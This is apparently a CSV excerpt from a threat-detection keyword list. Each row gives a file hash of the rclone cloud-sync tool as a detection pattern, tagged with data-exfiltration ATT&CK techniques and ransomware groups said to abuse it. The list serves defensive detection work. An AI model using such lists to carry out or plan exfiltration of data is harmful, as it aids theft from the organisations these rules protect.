"*3b39b4f2bc0e474051c15ec7f110d9087f096107096913f2672ef8fd4f2ecfb6*",".{0,1000}3b39b4f2bc0e474051c15ec7f110d9087f096107096913f2672ef8fd4f2ecfb6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3b86cb342175e34a6bd96c020a73c0b368572c894b2e6f4dfcac234c58449e22*",".{0,1000}3b86cb342175e34a6bd96c020a73c0b368572c894b2e6f4dfcac234c58449e22.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3bae7cc19b18dfc427e61c4e42c03c4a77ace51552c2583b644b7fa89380776c*",".{0,1000}3bae7cc19b18dfc427e61c4e42c03c4a77ace51552c2583b644b7fa89380776c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3bb03c08f11fda276c953544487558c3c0bfe14f89796b9eaa108a334d854ed1*",".{0,1000}3bb03c08f11fda276c953544487558c3c0bfe14f89796b9eaa108a334d854ed1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3bf56844b1e6391473d1e6758622840471eac1e24c36eacfcde1aca27eadb810*",".{0,1000}3bf56844b1e6391473d1e6758622840471eac1e24c36eacfcde1aca27eadb810.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3c217d484b2d801274b135b11ea010a3084a25943735e7a1e153f6acfe8659f3*",".{0,1000}3c217d484b2d801274b135b11ea010a3084a25943735e7a1e153f6acfe8659f3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3c6f9fec7bf83c71b2ac9fbcea0f30ab0aaf949bf53b70e8ec12413bc059911a*",".{0,1000}3c6f9fec7bf83c71b2ac9fbcea0f30ab0aaf949bf53b70e8ec12413bc059911a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3c8b4049525d16bfe42738bf74f2d264fc18499397e46e907d1214a39bea21dd*",".{0,1000}3c8b4049525d16bfe42738bf74f2d264fc18499397e46e907d1214a39bea21dd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3c9ce97365381994fdf43d5f68c87af7c656334556fae7fa066a037efef3d743*",".{0,1000}3c9ce97365381994fdf43d5f68c87af7c656334556fae7fa066a037efef3d743.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3cb6b58557fd8452c97f46484d284d61d86586b007b4cee7ca1f3ccb43c06951*",".{0,1000}3cb6b58557fd8452c97f46484d284d61d86586b007b4cee7ca1f3ccb43c06951.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3cedfcd57d1096bfc0c7469e8e356e13b999a338214dd610063f8abee6d80873*",".{0,1000}3cedfcd57d1096bfc0c7469e8e356e13b999a338214dd610063f8abee6d80873.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3d62de527d3a1292219a95c311513899fe899b750428d9d809f556371d1f90b9*",".{0,1000}3d62de527d3a1292219a95c311513899fe899b750428d9d809f556371d1f90b9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3d815e0319651626bb752b11a4a1d78ea7fea889b99a92a52f5ce54db641f82f*",".{0,1000}3d815e0319651626bb752b11a4a1d78ea7fea889b99a92a52f5ce54db641f82f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3e04c44cdbc61721edef92ac05cc7e548e57e69397e54c24878e2edc56ddd3fb*",".{0,1000}3e04c44cdbc61721edef92ac05cc7e548e57e69397e54c24878e2edc56ddd3fb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3e08555b23f907601feacbfcbece4fa635812ae7a28061f25e2aa6d54e48124c*",".{0,1000}3e08555b23f907601feacbfcbece4fa635812ae7a28061f25e2aa6d54e48124c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3e1cfdaa245dd2d7789d33a0be13c5bd5ef91e1da6e5eefd380cdf3fb1d50d63*",".{0,1000}3e1cfdaa245dd2d7789d33a0be13c5bd5ef91e1da6e5eefd380cdf3fb1d50d63.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3e3d48e0a1de878866d3f6d9beb1009c4140ede45b95d092bcaf68fae6a030a0*",".{0,1000}3e3d48e0a1de878866d3f6d9beb1009c4140ede45b95d092bcaf68fae6a030a0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3e435c81cc364a3c6f1d5f9305f03dbf5152e85f445c9354cc16b30654fd444e*",".{0,1000}3e435c81cc364a3c6f1d5f9305f03dbf5152e85f445c9354cc16b30654fd444e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3e5ffce470feaeeb55edfaaec9b89ccb43feed4133d267eb77fd4ef3da4d9b73*",".{0,1000}3e5ffce470feaeeb55edfaaec9b89ccb43feed4133d267eb77fd4ef3da4d9b73.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3ee1b022bb0519d3aeb745f00dae50452b159ba1b912d607278609d7a582f883*",".{0,1000}3ee1b022bb0519d3aeb745f00dae50452b159ba1b912d607278609d7a582f883.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3ee1eca313dce3dea259fcf6951a9350b09763ecfef0ef1866ec2e9fe81f7b61*",".{0,1000}3ee1eca313dce3dea259fcf6951a9350b09763ecfef0ef1866ec2e9fe81f7b61.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3ee64a172c1a706749b25d6b12c4bf8c7896a93c52a803fc90548917cef72e13*",".{0,1000}3ee64a172c1a706749b25d6b12c4bf8c7896a93c52a803fc90548917cef72e13.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3f50d0a422df063a5b331f49f2255d8180e851f963f54857b722ae1c2eb89bd0*",".{0,1000}3f50d0a422df063a5b331f49f2255d8180e851f963f54857b722ae1c2eb89bd0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*3fafe29d84e57deb5130c4f7a77f50e52ae5f4dc0d1499a11b7ac499c6c106b3*",".{0,1000}3fafe29d84e57deb5130c4f7a77f50e52ae5f4dc0d1499a11b7ac499c6c106b3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4002d10859ed910f4196db8dcc00732f75553aa972ea262884d69b649754d924*",".{0,1000}4002d10859ed910f4196db8dcc00732f75553aa972ea262884d69b649754d924.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4042d649ac4c62d1b8eac5c071ff714f62f94df4a308e3a0b17de7e2e57df9ab*",".{0,1000}4042d649ac4c62d1b8eac5c071ff714f62f94df4a308e3a0b17de7e2e57df9ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*405f614bdde26a1e2ff55631cf9be70946b1cf0270812869979d9c0d8a5eaa5e*",".{0,1000}405f614bdde26a1e2ff55631cf9be70946b1cf0270812869979d9c0d8a5eaa5e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*408376273b03ff8f5c3e4b216647a5db23b9aa75b9b8026f2fe7d0ffa6bf2d3b*",".{0,1000}408376273b03ff8f5c3e4b216647a5db23b9aa75b9b8026f2fe7d0ffa6bf2d3b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4087bcd3d012bd26bb52001da514e1604ccae2221acd339262b5fd47ea7115c3*",".{0,1000}4087bcd3d012bd26bb52001da514e1604ccae2221acd339262b5fd47ea7115c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*40b08d7e300fd1d46d9225ad6d52149e4194c3f0d0b65361c04fb606d908a689*",".{0,1000}40b08d7e300fd1d46d9225ad6d52149e4194c3f0d0b65361c04fb606d908a689.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*40d243dd3460e13d50f226a15179c41c2aacbd94aab1e674b1437f377b57c6f2*",".{0,1000}40d243dd3460e13d50f226a15179c41c2aacbd94aab1e674b1437f377b57c6f2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*411cd0194b22b0faf50bcf7beaed9a0d4efabf13baff4dfa7697793319d6f175*",".{0,1000}411cd0194b22b0faf50bcf7beaed9a0d4efabf13baff4dfa7697793319d6f175.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*4142fb8124bf37c432a14d469b8f3b194f3a0ea3aec3aa690d2c28d12affda90*",".{0,1000}4142fb8124bf37c432a14d469b8f3b194f3a0ea3aec3aa690d2c28d12affda90.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*41a404f59d6640bae7726c29479528113cb7e95c0a3c5ea91eefabdf6cf43f24*",".{0,1000}41a404f59d6640bae7726c29479528113cb7e95c0a3c5ea91eefabdf6cf43f24.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*41de382da51e57e7519012830002af83ca551927551ab8b277a21d24905ff177*",".{0,1000}41de382da51e57e7519012830002af83ca551927551ab8b277a21d24905ff177.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*421d9592c839d903608d1725007dfe5243f30fe812c0054b9d21f1eaa05b4a1c*",".{0,1000}421d9592c839d903608d1725007dfe5243f30fe812c0054b9d21f1eaa05b4a1c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
